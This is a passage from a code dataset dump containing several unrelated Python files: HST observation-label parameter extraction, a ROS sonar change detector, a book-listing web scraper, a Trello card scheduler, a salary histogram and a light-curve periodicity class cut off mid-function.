PLATE_SCALES[key])\n if scale < SCALE_MAX:\n scale *= int(get_binning_mode(data_lookups, shm_lookup))\n formatted = \"%.4f\" % scale # up to 4 decimal places\n return formatted.rstrip(\"0\") # don't include trailing zeros\n return \"0.0\"\n\n\n##############################\n# get_spectral_resolution\n##############################\ndef get_spectral_resolution(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n # Works for STIS\n try:\n return \"%.4f\" % (float(lookup[\"SPECRES\"]) * 1.0e-4)\n except KeyError:\n return \"0.\"\n\n\n##############################\n# get_start_stop_date_time\n##############################\ndef get_start_stop_date_times(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> Tuple[str, str]:\n \"\"\"\n Return text for the ```` and ```` XML\n elements.\n \"\"\"\n\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n\n # HST documents indicate that times are only accurate to a second or so.\n # This is consistent with the fact that start times indicated by DATE-OBS\n # and TIME-OBS often disagree with the times as indicated by EXPSTART at the\n # level of a second or so. For any individual time, this is fine, but we\n # want to be sure that the difference between the start and stop times is\n # compatible with the exposure time, whenever appropriate.\n #\n # I say \"whenever appropriate\" because there are times when multiple images\n # have been drizzled or otherwise merged. In this case, the start and stop\n # times refer to the first and last of the set of images, respectively, and\n # their difference can be much greater than the exposure time.\n #\n # It takes some careful handling to get the behavior we want.\n\n # Figure out what's available in the header\n try:\n date_obs = lookup[\"DATE-OBS\"]\n except KeyError:\n date_obs = None\n\n try:\n time_obs = lookup[\"TIME-OBS\"]\n except KeyError:\n time_obs = None\n\n exptime = float(lookup[\"EXPTIME\"])\n\n try: # either EXPSTART or TEXPSTART should be available\n expstart = float(lookup[\"EXPSTART\"])\n except KeyError:\n expstart = float(lookup[\"TEXPSTART\"])\n\n try: # either EXPEND or TEXPEND should be available\n expend = float(lookup[\"EXPEND\"])\n except KeyError:\n expend = float(lookup[\"TEXPEND\"])\n\n # Decide which delta-time to use\n # Our start and stop times are only ever good to the nearest second, but we\n # want to ensure that the difference looks right. For this purpose,\n # non-integral exposure times should be rounded up to the next integer.\n delta_from_mjd = (expend - expstart) * 86400.0\n if delta_from_mjd > exptime + 2.0: # if the delta is too large, we know\n # multiple images were combined\n delta = delta_from_mjd\n else:\n delta = -(-exptime // 1.0) # rounded up to nearest int\n\n # Fill in the start time; update the expstart in MJD units if necessary.\n # If DATE-OBS and TIME-OBS values are provided, we use this as the start\n # time because it is the value our users would expect. There exist cases\n # when these values are not provided, and in that case we use EXPSTART,\n # converted from MJD. Note that these MJD values are in UTC, not TAI. In\n # other words, we need to ignore leapseconds in these time conversions.\n if date_obs and time_obs:\n start_time = date_obs + \"T\" + time_obs + \"Z\"\n day = julian.day_from_iso(date_obs)\n sec = julian.sec_from_iso(time_obs)\n expstart = julian.mjd_from_day_sec(day, sec)\n else:\n (day, sec) = julian.day_sec_from_mjd(expstart)\n start_time = julian.ymdhms_format_from_day_sec(day, sec, suffix=\"Z\")\n\n # Fill in the stop time. We ensure that this differs from the start time by\n # the expected amount.\n expend = expstart + delta / 86400.0\n (day, sec) = julian.day_sec_from_mjd(expend)\n stop_time = julian.ymdhms_format_from_day_sec(day, sec, suffix=\"Z\")\n\n return (start_time, stop_time)\n\n\n##############################\n# get_subarray_flag\n##############################\ndef get_subarray_flag(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n value: str = lookup[\"SUBARRAY\"]\n if value == \"1\" or value.startswith(\"T\"):\n return \"true\"\n elif value == \"0\" or value.startswith(\"F\"):\n return \"false\"\n raise ValueError(\n \"unrecognized SUBARRAY value (%s) in %s\" % (value, fname(lookup))\n )\n except KeyError:\n return \"false\"\n\n\n##############################\n# get_targeted_detector_ids\n##############################\ndef get_targeted_detector_ids(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> List[str]:\n \"\"\"\n Return a list of one or more text values for the\n ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n aperture = get_aperture_name(data_lookups, shm_lookup)\n if instrument == \"WFPC2\":\n if aperture in (\"WFALL\", \"WFALL-FIX\"):\n return [\"PC1\", \"WF2\", \"WF3\", \"WF4\"]\n if aperture in (\"PC1\", \"PC1-FIX\", \"POLQP15P\", \"FQCH4P15\"):\n return [\"PC1\"]\n if aperture in (\n \"WF2\",\n \"WF2-FIX\",\n \"FQUVN33\",\n \"POLQN33\",\n \"POLQN18\",\n \"POLQP15W\",\n \"FQCH4NW2\",\n ):\n return [\"WF2\"]\n if aperture == \"FQCH4N33\":\n return [\"WF2\", \"WF3\"]\n if aperture in (\"WF3\", \"WF3-FIX\", \"FQCH4NW3\", \"F160BN15\"):\n return [\"WF3\"]\n if aperture in (\"WF4\", \"WF4-FIX\", \"FQCH4NW4\", \"FQCH4W4\"):\n return [\"WF4\"]\n if aperture == \"FQCH4N1\":\n return [\"PC1\", \"WF3\"]\n if aperture == \"FQCH4N15\":\n return [\"PC1\"]\n if aperture == \"FQCH4W3\":\n return [\"WF3\"]\n raise ValueError(\n \"unrecognized WFPC2 aperture (%s) for %s [%s]\"\n % (aperture, fname(lookup), lookup),\n )\n channel = get_channel_id(data_lookups, shm_lookup)\n if instrument == \"ACS\" and channel == \"WFC\":\n if aperture.startswith(\"WFC1\"):\n return [\"WFC1\"]\n if aperture.startswith(\"WFC2\"):\n return [\"WFC2\"]\n return [\"WFC1\", \"WFC2\"]\n if instrument == \"WFC\" and channel == \"UVIS\":\n if aperture.startswith(\"UVIS1\"):\n return [\"UVIS1\"]\n if aperture.startswith(\"UVIS2\"):\n return [\"UVIS2\"]\n if aperture.startswith(\"UVIS-QUAD\"):\n filter = lookup[\"FILTER\"].strip()\n if filter in (\n \"FQ378N\",\n \"FQ387N\",\n \"FQ437N\",\n \"FQ492N\",\n \"FQ508N\",\n \"FQ619N\",\n \"FQ674N\",\n \"FQ750N\",\n \"FQ889N\",\n \"FQ937N\",\n ):\n return [\"UVIS1\"]\n if filter in (\n \"FQ232N\",\n \"FQ243N\",\n \"FQ422M\",\n \"FQ436N\",\n \"FQ575N\",\n \"FQ634N\",\n \"FQ672N\",\n \"FQ727N\",\n \"FQ906N\",\n \"FQ924N\",\n ):\n return [\"UVIS2\"]\n raise ValueError(\n \"unrecognized quad aperture/filter (%s/%s) in %s\"\n % (aperture, filter, fname(lookup))\n )\n return [\"UVIS1\", \"UVIS2\"]\n if instrument == \"WF/PC\":\n # I cannot find documentation for the apertures for WF/PC so this is\n # just an educated guess\n if aperture not in (\"ALL\", \"W1\", \"W2\", \"W3\", \"W4\", \"P5\", \"P6\", \"P7\", \"P8\"):\n raise ValueError(\n \"unknown WF/PC aperture (%s) in %s\" % (aperture, fname(lookup))\n )\n if aperture == \"ALL\":\n return get_detector_ids(data_lookups, shm_lookup) # all detectors\n elif aperture.startswith(\"W\"):\n return [aperture[0] + \"F\" + aperture[1]] # WFn\n else:\n return [aperture[0] + \"C\" + aperture[1]] # PCn\n return get_detector_ids(data_lookups, shm_lookup)\n\n\n############################################################\n\n\ndef _make_fragment(\n param_name: str, param_values: List[str], node_builder: NodeBuilderTemplate\n) -> FragBuilder:\n return combine_nodes_into_fragment(\n [node_builder({param_name: value}) for value in param_values]\n )\n\n\ndef _get_detector_ids_fragment(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> FragBuilder:\n return _make_fragment(\n \"detector_id\", get_detector_ids(data_lookup, shm_lookup), detector_id\n )\n\n\ndef _get_moving_target_descriptions_fragment(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> FragBuilder:\n return _make_fragment(\n \"moving_target_description\",\n get_moving_target_descriptions(data_lookup, shm_lookup),\n moving_target_description,\n )\n\n\ndef _get_moving_target_keywords_fragment(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> FragBuilder:\n return _make_fragment(\n \"moving_target_keyword\",\n get_moving_target_keywords(data_lookup, shm_lookup),\n moving_target_keyword,\n )\n\n\ndef _get_targeted_detector_ids_fragment(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> FragBuilder:\n return _make_fragment(\n \"targeted_detector_id\",\n get_targeted_detector_ids(data_lookup, shm_lookup),\n targeted_detector_id,\n )\n\n\n############################################################\n\n\ndef _get_program_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"mast_observation_id\": get_mast_observation_id(data_lookup, shm_lookup),\n \"hst_proposal_id\": get_hst_proposal_id(data_lookup, shm_lookup),\n \"hst_pi_name\": get_hst_pi_name(data_lookup, shm_lookup),\n }\n\n\ndef _get_instrument_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"instrument_id\": get_instrument_id(data_lookup, shm_lookup),\n \"channel_id\": get_channel_id(data_lookup, shm_lookup),\n \"detector_ids\": _get_detector_ids_fragment(data_lookup, shm_lookup), # FRAGMENT\n \"observation_type\": get_observation_type(data_lookup, shm_lookup),\n }\n\n\ndef _get_pointing_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"hst_target_name\": get_hst_target_name(data_lookup, shm_lookup),\n \"moving_target_flag\": get_moving_target_flag(data_lookup, shm_lookup),\n \"moving_target_keywords\": _get_moving_target_keywords_fragment(\n data_lookup, shm_lookup\n ), # FRAGMENT\n \"moving_target_descriptions\": _get_moving_target_descriptions_fragment(\n data_lookup, shm_lookup\n ), # FRAGMENT\n \"aperture_name\": get_aperture_name(data_lookup, shm_lookup),\n \"proposed_aperture_name\": get_proposed_aperture_name(data_lookup, shm_lookup),\n \"targeted_detector_ids\": _get_targeted_detector_ids_fragment(\n data_lookup, shm_lookup\n ), # FRAGMENT\n }\n\n\ndef _get_tracking_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"fine_guidance_sensor_lock_type\": get_fine_guidance_sensor_lock_type(\n data_lookup, shm_lookup\n ),\n \"gyroscope_mode\": get_gyroscope_mode(data_lookup, shm_lookup),\n }\n\n\ndef _get_exposure_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"exposure_duration\": get_exposure_duration(data_lookup, shm_lookup),\n \"exposure_type\": get_exposure_type(data_lookup, shm_lookup),\n }\n\n\ndef _get_wavelength_filter_grating_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"filter_name\": get_filter_name(data_lookup, shm_lookup),\n \"center_filter_wavelength\": get_center_filter_wavelength(\n data_lookup, shm_lookup\n ),\n \"bandwidth\": get_bandwidth(data_lookup, shm_lookup),\n \"spectral_resolution\": get_spectral_resolution(data_lookup, shm_lookup),\n }\n\n\ndef _get_operational_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"instrument_mode_id\": get_instrument_mode_id(data_lookup, shm_lookup),\n \"gain_setting\": get_gain_setting(data_lookup, shm_lookup),\n \"coronagraph_flag\": get_coronagraph_flag(data_lookup, shm_lookup),\n \"cosmic_ray_split_count\": get_cosmic_ray_split_count(data_lookup, shm_lookup),\n \"repeat_exposure_count\": get_repeat_exposure_count(data_lookup, shm_lookup),\n \"subarray_flag\": get_subarray_flag(data_lookup, shm_lookup),\n \"binning_mode\": get_binning_mode(data_lookup, shm_lookup),\n \"plate_scale\": get_plate_scale(data_lookup, shm_lookup),\n }\n\n\ndef get_hst_parameters_dict(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n sub_dicts: List[Dict[Any, Any]] = [\n _get_program_parameters(data_lookup, shm_lookup),\n _get_instrument_parameters(data_lookup, shm_lookup),\n _get_pointing_parameters(data_lookup, shm_lookup),\n _get_tracking_parameters(data_lookup, shm_lookup),\n _get_exposure_parameters(data_lookup, shm_lookup),\n _get_wavelength_filter_grating_parameters(data_lookup, shm_lookup),\n _get_operational_parameters(data_lookup, shm_lookup),\n ]\n return {key: val for d in sub_dicts for key, val in d.items()}\n\n\n############################################################\ndef get_hst_parameters(data_lookup: List[Lookup], shm_lookup: Lookup) -> NodeBuilder:\n d: Dict[Any, Any] = get_hst_parameters_dict(data_lookup, shm_lookup)\n return hst_parameters(\n {\n \"program_parameters\": program_parameters(d),\n \"instrument_parameters\": instrument_parameters(d),\n \"pointing_parameters\": pointing_parameters(d),\n \"tracking_parameters\": tracking_parameters(d),\n \"exposure_parameters\": exposure_parameters(d),\n \"wavelength_filter_grating_parameters\": wavelength_filter_grating_parameters(\n d\n ),\n \"operational_parameters\": operational_parameters(d),\n }\n )\n","sub_path":"pdart/labels/hst_parameters.py","file_name":"hst_parameters.py","file_ext":"py","file_size_in_byte":37637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"597470252","text":"#!/usr/bin/env python\n\nimport rospy\n\nimport cv2\nimport scipy.misc\nfrom PIL import Image\n\nimport numpy as np\nimport scipy.interpolate\nimport math\nimport matplotlib.pyplot as plt\n\nimport tf\nimport tf2_ros\nfrom tf.transformations import rotation_matrix, rotation_from_matrix, translation_matrix, translation_from_matrix, quaternion_matrix, quaternion_from_matrix\n\nfrom sensor_msgs.msg import PointCloud2\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Transform, PoseWithCovarianceStamped\nimport sensor_msgs.point_cloud2 as pc2\n\nimport message_filters\n\nclass ChangeDetector(object):\n\n def __init__(self):\n\n map_frame = rospy.get_param('~map_frame', 'map') # map frame_id\n odom_frame = rospy.get_param('~odom_frame', 'odom')\n meas_model_as = rospy.get_param('~mbes_as', '/mbes_sim_server') # map frame_id\n auv_odom_top = rospy.get_param(\"~odometry_topic\", '/odom')\n auv_mbes_top = rospy.get_param(\"~mbes_pings_topic\", '/mbes')\n auv_exp_mbes_top = rospy.get_param(\"~expected_mbes_topic\", '/expected_mbes')\n pf_pose_top = rospy.get_param(\"~average_pose_topic\", '/avg_pose')\n\n self.auv_mbes = message_filters.Subscriber(auv_mbes_top, PointCloud2)\n self.exp_mbes = message_filters.Subscriber(auv_exp_mbes_top, PointCloud2)\n self.auv_pose = message_filters.Subscriber(auv_odom_top, Odometry)\n # self.pf_pose = message_filters.Subscriber(pf_pose_top, PoseWithCovarianceStamped)\n self.ts = message_filters.ApproximateTimeSynchronizer([self.auv_mbes, self.exp_mbes,\n self.auv_pose],\n 10, slop=10.0,\n allow_headerless=False)\n\n # Initialize tf listener\n tfBuffer = tf2_ros.Buffer()\n tf2_ros.TransformListener(tfBuffer)\n try:\n rospy.loginfo(\"Waiting for transforms\")\n mbes_tf = tfBuffer.lookup_transform('hugin/base_link', 'hugin/mbes_link',\n rospy.Time(0), rospy.Duration(20.))\n self.base2mbes_mat = self.matrix_from_tf(mbes_tf)\n\n m2o_tf = tfBuffer.lookup_transform(map_frame, odom_frame,\n rospy.Time(0), rospy.Duration(20.))\n self.m2o_mat = self.matrix_from_tf(m2o_tf)\n\n rospy.loginfo(\"Transforms locked - Car detector node\")\n except:\n rospy.loginfo(\"ERROR: Could not lookup transform from base_link to mbes_link\")\n\n\n # Register cb after tf is locked\n self.ts.registerCallback(self.pingCB)\n\n plt.ion()\n plt.show()\n self.scale = 1\n self.max_height = 100 # TODO: this should equal the n beams in ping\n self.new_msg = False\n first_msg = True\n self.waterfall =[]\n\n while not rospy.is_shutdown():\n if self.new_msg:\n # Blob detection to find the car on waterfall image\n #Visualize\n if len(self.waterfall)==self.max_height:\n waterfall_detect = self.car_detection(np.array(self.waterfall), self.scale)\n plt.imshow(np.array(waterfall_detect), norm=plt.Normalize(0., 60.),\n cmap='gray', aspect='equal')\n else:\n plt.imshow(np.array(self.waterfall), norm=plt.Normalize(0., 60.),\n cmap='gray', aspect='equal')\n if first_msg:\n first_msg = False\n plt.colorbar()\n plt.title(\"Bathymetry difference (m)\")\n\n plt.pause(0.01)\n\n self.new_msg = False\n\n # rospy.spin()\n\n def car_detection(self, img_array, scale):\n # Turn numpy array into cv2 image (and make bigger)\n img_array = np.float32(img_array)\n f = scipy.interpolate.RectBivariateSpline(np.linspace(0 ,1, np.size(img_array, 0)), np.linspace(0, 1, np.size(img_array, 1)), img_array)\n img_array = f(np.linspace(0, 1, scale*np.size(img_array, 0)), np.linspace(0, 1, scale*np.size(img_array, 1)))\n gray_img = cv2.normalize(src=img_array, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n\n # Setup SimpleBlobDetector parameters.\n params = cv2.SimpleBlobDetector_Params()\n\n params.minThreshold = 100;\n params.maxThreshold = 5000;\n\n params.filterByArea = True\n params.minArea = 200\n\n params.filterByCircularity = False\n params.minCircularity = 0.785\n\n params.filterByConvexity = False\n params.minConvexity = 0.87\n detector = cv2.SimpleBlobDetector_create(params)\n\n # Detect blobs.\n keypoints = detector.detect(gray_img)\n im_with_keypoints = cv2.drawKeypoints(gray_img, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n #gray_im_with_keypoints = cv2.cvtColor(im_with_keypoints, cv2.COLOR_BGR2GRAY)\n\n # Turn cv2 image back to numpy array, scale it down, and return\n out_img_array = np.empty((np.size(img_array,0), np.size(img_array,1) ,3), dtype=float)\n for i in range(np.size(im_with_keypoints,2)):\n f = scipy.interpolate.RectBivariateSpline(np.linspace(0 ,255, np.size(im_with_keypoints, 0)),\n np.linspace(0,255, np.size(im_with_keypoints, 1)), im_with_keypoints[:,:,i])\n out_img_array[:,:,i] = f(np.linspace(0, 255, np.size(img_array, 0)), np.linspace(0, 255, np.size(img_array, 1)))\n out_img_array = out_img_array.astype(float)\n return out_img_array\n\n def pcloud2ranges(self, point_cloud, tf_mat):\n angle, direc, point = rotation_from_matrix(tf_mat)\n R = rotation_matrix(angle, direc, point)\n rot_inv = R[np.ix_([0,1,2],[0,1,2])].transpose()\n\n t = translation_from_matrix(tf_mat)\n t_inv = rot_inv.dot(t)\n\n ranges = []\n for p in pc2.read_points(point_cloud, field_names = (\"x\", \"y\", \"z\"), skip_nans=True):\n p_part = rot_inv.dot(p) - t_inv\n ranges.append(np.linalg.norm(p_part))\n\n return np.asarray(ranges)\n\n def ping2ranges(self, point_cloud):\n\n ranges = []\n for p in pc2.read_points(point_cloud, field_names = (\"x\", \"y\", \"z\"), skip_nans=True):\n ranges.append(np.linalg.norm(p))\n\n return np.asarray(ranges)\n\n\n def pingCB(self, auv_ping, exp_ping, auv_pose):\n try:\n particle_tf = Transform()\n particle_tf.translation = auv_pose.pose.pose.position\n particle_tf.rotation = auv_pose.pose.pose.orientation\n tf_mat = self.matrix_from_tf(particle_tf)\n m2auv = np.matmul(self.m2o_mat, np.matmul(tf_mat, self.base2mbes_mat))\n\n auv_ping_ranges = self.ping2ranges(auv_ping)\n exp_ping_ranges = self.pcloud2ranges(exp_ping, m2auv)\n # print \"------\"\n # print auv_ping_ranges\n # print exp_ping_ranges\n\n self.waterfall.append(abs(auv_ping_ranges[:self.max_height] - exp_ping_ranges[:self.max_height]))\n if len(self.waterfall)>self.max_height:\n self.waterfall.pop(0)\n\n self.new_msg = True\n\n except rospy.ROSInternalException:\n pass\n\n def matrix_from_tf(self, transform):\n if transform._type == 'geometry_msgs/TransformStamped':\n transform = transform.transform\n\n trans = (transform.translation.x,\n transform.translation.y,\n transform.translation.z)\n quat_ = (transform.rotation.x,\n transform.rotation.y,\n transform.rotation.z,\n transform.rotation.w)\n\n tmat = translation_matrix(trans)\n qmat = quaternion_matrix(quat_)\n\n return np.dot(tmat, qmat)\n\n\nif __name__ == '__main__':\n\n rospy.init_node('car_detector_node')\n try:\n ChangeDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not launch car detector node')\n pass\n","sub_path":"detection/change_detection/scripts/change_detector.py","file_name":"change_detector.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"521710585","text":"import requests\nfrom lxml import etree\nfrom bs4 import BeautifulSoup\nimport json\n\n\nclass BookSpider(object):\n def __init__(self):\n self.base_url = 'http://www.allitebooks.com/page/{}'\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}\n\n self.data_list = []\n\n # 1.构建所有url\n def get_url_list(self):\n url_list = []\n for i in range(1, 10):\n url = self.base_url.format(i)\n\n url_list.append(url)\n\n return url_list\n\n # 2.发请求\n def send_request(self, url):\n data = requests.get(url, headers=self.headers).content.decode()\n print(url)\n return data\n\n # 3.解析数据 xpath\n def parse_xpath_data(self, data):\n parse_data = etree.HTML(data)\n\n # 1.解析出所有的书 book\n book_list = parse_data.xpath('//div[@class=\"main-content-inner clearfix\"]/article')\n\n # 2.解析出 每本书的 信息\n for book in book_list:\n book_dict = {}\n # 1.书名字\n book_dict['book_name'] = book.xpath('.//h2[@class=\"entry-title\"]//text()')[0]\n\n # 2.书的图片url\n book_dict['book_img_url'] = book.xpath('div[@class=\"entry-thumbnail hover-thumb\"]/a/img/@src')[0]\n\n # 3.书的作者\n book_dict['book_author'] = book.xpath('.//h5[@class=\"entry-author\"]//text()')[0]\n\n # 4.书的简介\n book_dict['book_info'] = book.xpath('.//div[@class=\"entry-summary\"]/p/text()')[0]\n\n self.data_list.append(book_dict)\n\n def parse_bs4_data(self, data):\n\n bs4_data = BeautifulSoup(data, 'lxml')\n # 1.取出所有的书\n book_list = bs4_data.select('article')\n\n\n\n # 2.解析出 每本书的 信息\n for book in book_list:\n book_dict = {}\n # 1.书名字\n book_dict['book_name'] = book.select_one('.entry-title').get_text()\n\n # # 2.书的图片url\n book_dict['book_img_url'] = book.select_one('.attachment-post-thumbnail').get('src')\n\n # # 3.书的作者\n book_dict['book_author'] = book.select_one('.entry-author').get_text()[3:]\n #\n # # 4.书的简介\n book_dict['book_info'] = book.select_one('.entry-summary p').get_text()\n print(book_dict)\n self.data_list.append(book_dict)\n\n # 4.保存数据\n def save_data(self):\n json.dump(self.data_list, open(\"04book.json\", 'w'))\n\n # 统筹调用\n def start(self):\n\n url_list = self.get_url_list()\n\n # 循环遍历发送请求\n for url in url_list:\n data = self.send_request(url)\n # self.parse_xpath_data(data)\n self.parse_bs4_data(data)\n\n self.save_data()\n\n\nBookSpider().start()\n","sub_path":".NetServiceConfiguration/帮助文档/python/案列/04-book.py","file_name":"04-book.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"505303323","text":"import schedule\nimport time\nfrom datetime import datetime, timedelta\nfrom threading import Thread\nfrom services.trello_api_utils import TrelloApiUtils\n\n\n# This class is responsible for cards transfering between lists. \n# For example, every day at 00:00 AM move all cards from 'Daily Plan'\n# column to 'Weekly Plan' and the same for 'Weekly' to 'Monthly'\nclass TrelloDashboardCollectorScheduler(Thread):\n \n\n def __init__(self, trello_api_utils):\n Thread.__init__(self)\n self.trello_api_utils = trello_api_utils\n schedule.every().day.at('00:00').do(self.moveTickets)\n # move all tickets with assigned dates into corresponding columns \n schedule.every().day.at(\"00:10\").do(self.trello_api_utils.transfer_tickets_to_corresponding_columns_by_its_due_dates)\n schedule.every().day.at(\"12:00\").do(self.trello_api_utils.transfer_tickets_to_corresponding_columns_by_its_due_dates)\n\n def moveTickets(self):\n # move all cards from 'Daily Plan' list into 'Weekly Plan'\n self.trello_api_utils.transfer_all_cards_from_daily_to_weekly_column()\n\n current_day_and_month = \"{day}.{month}\".format(day = datetime.now().day, month = f\"{datetime.now():%m}\")\n # update title for daily column\n self.trello_api_utils.update_daily_column_date(current_day_and_month)\n\n weekly_column_date_deadline = self.trello_api_utils.get_weekly_column_end_date()\n if weekly_column_date_deadline == current_day_and_month: \n # move all cards from 'Weekly Plan' list into 'Monthly Plan'\n self.trello_api_utils.transfer_all_cards_from_weekly_to_monthly_column()\n \n # update title for weekly column\n new_weekly_column_start_date = \"{startDay}.{startMonth}\".format(\n startDay = datetime.now().day, \n startMonth = f\"{datetime.now():%m}\"\n )\n new_weekly_column_end_date = \"{endDay}.{endMonth}\".format(\n endDay = (datetime.now() + timedelta(days = 7)).day, \n endMonth = f\"{(datetime.now() + timedelta(days = 7)):%m}\"\n )\n self.trello_api_utils.update_weekly_column_dates(new_weekly_column_start_date, new_weekly_column_end_date)\n\n # update title of monthly column\n self.trello_api_utils.update_monthly_column_date(\"{newDate}\".format(newDate = f\"{datetime.now():%m.%y}\"))\n else:\n print(\"[INFO] Today isn't the end of the week\")\n\n def run(self):\n while True:\n schedule.run_pending()\n time.sleep(1)","sub_path":"trello_bot/scheduler_trello_dashboard_collector.py","file_name":"scheduler_trello_dashboard_collector.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"419278057","text":"import csv\nimport matplotlib.pyplot as plt\nimport re\n\n\ndef read_csv_column(path, column):\n with open(path, 'r', encoding='utf-8', newline='') as f:\n reader = csv.reader(f)\n return [row[column] for row in reader]\n\n\nsal = read_csv_column('F:\\python代码\\python3.csv', 2)\nsalaries = []\na = []\nfor i in range(len(sal)):\n if not sal[i] == '面议xa0':\n salaries.append(sal[i])\nfor i in range(len(salaries)):\n complete = re.match('\\d{4,5}', salaries[i])\n a.append(int(complete.group()))\n\nplt.hist(a,bins=50)\nplt.show()\n","sub_path":"智联招聘2.py","file_name":"智联招聘2.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"227878021","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 5 12:56:37 2020\n\n@author: jimmy\n\"\"\"\n# Import relevant modules/packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.timeseries import LombScargle\nfrom ReadFile import Read\n\nclass Periodicity:\n \n def __init__(self,filename,objectname,colNames,numPoints=None,contiguous='True',period=None):\n # Inputs:\n # filename: file path or file name (if file in same folder as notebook)\n # objectname: name of object you're plotting curve of\n # numPoints: number of data points you want to use from the file\n # period: period of plot feature (only used if xaxis='Phase' to fold the data)\n self.file = filename\n self.object = objectname\n self.numPoints = numPoints\n self.period = period\n \n # Extract time, flux, and error data from text file\n self.times,self.fluxes,self.errors = Read(self.file,colNames)\n\n # Decide what times array to make\n if self.numPoints == None:\n self.times = [time - self.times[0] for time in self.times]\n else:\n if contiguous == 'True':\n # Select contiguous interval of points\n self.times = [time - self.times[0] for time in self.times[:self.numPoints]]\n self.fluxes = self.fluxes[:self.numPoints]\n self.errors = self.errors[:self.numPoints]\n elif contiguous == 'Bookend':\n # Select sparsed interval of data\n self.times_i = [time - self.times[0] for time in self.times[:self.numPoints]]\n self.times_f = [time - self.times[0] for time in self.times[-self.numPoints:]]\n self.times = self.times_i + self.times_f\n \n # Concatenate first and last n elements of flux list\n self.fluxes_i = self.fluxes[:self.numPoints]\n self.fluxes_f = self.fluxes[-self.numPoints:]\n self.fluxes = [*self.fluxes_i,*self.fluxes_f]\n \n # Concatenate first and last n elements of error list\n self.errors_i = self.errors[:self.numPoints]\n self.errors_f = self.errors[-self.numPoints:]\n self.errors = [*self.errors_i,*self.errors_f]\n elif contiguous == 'Random':\n # Generate random list of indices\n randoms = np.random.randint(0, high=len(self.times), size=numPoints)\n #print(randoms)\n # Select random sparsed interval of data\n self.times = self.times[randoms]\n \n # Concatenate first and last n elements of flux list\n self.fluxes = self.fluxes[randoms]\n \n # Concatenate first and last n elements of error list\n self.errors = self.errors[randoms]\n\n # Function for plotting light curves from text file\n def LightCurve(self,plot=True,xaxis='Time',curve='Flux'):\n # Inputs:\n # plot: boolean to decide whether to plot the data (True) or not (False)\n # xaxis: decide which x parameter to calculate/plot ('Time or Phase')\n # curve: string that indicates y parameter being plotted (used in axis label)\n # Returns:\n # xdata: array with data from x-axis\n # fluxes: array with associated y-axis data\n # errors: measurement errors read from text file\n \n # Define list of data to plot on x-axis (time or phase)\n xdata = []\n \n if plot == True:\n # Initialize axis figure and axis\n fig = plt.figure()\n ax = fig.add_subplot(111)\n \n # Decide what x-axis should be\n if xaxis == 'Time':\n xlabel = 'Time (days)'\n \n # Plot flux vs time\n ax.scatter(self.times,self.fluxes)\n \n xdata = self.times\n \n elif xaxis == 'Phase':\n xlabel = 'Phase'\n \n # Calculate phase from time data\n phases = [(time%self.period)/self.period for time in self.times]\n \n # Make a scatter plot of flux vs. phase\n ax.scatter(phases,self.fluxes,label='Period = {0:.3f} days'.format(self.period))\n \n xdata = phases\n ax.set_ylim(0.999,1.0006)\n ax.set_xlim(0.0,0.2)\n \n # Add plot features\n ax.set_xlabel(xlabel,fontsize=14)\n ax.set_ylabel('{0}'.format(curve),fontsize=14)\n ax.set_title('{0} vs. {1} for {2}'.format(curve,xaxis,self.object),fontsize=18)\n ax.legend()\n else:\n # Decide what x-axis should be\n if xaxis == 'Time':\n xdata = self.times\n elif xaxis == 'Phase':\n # Calculate phase from time data\n phases = [(time%self.period)/self.period for time in self.times]\n xdata = phases\n \n return(xdata,self.fluxes,self.errors)\n\n # Function to generate power spectrum from a flux vs. time dataset\n def LS(self,minP,maxP,numIntervals,i,flux,plot=False,trueP=None):\n \n if flux == []:\n 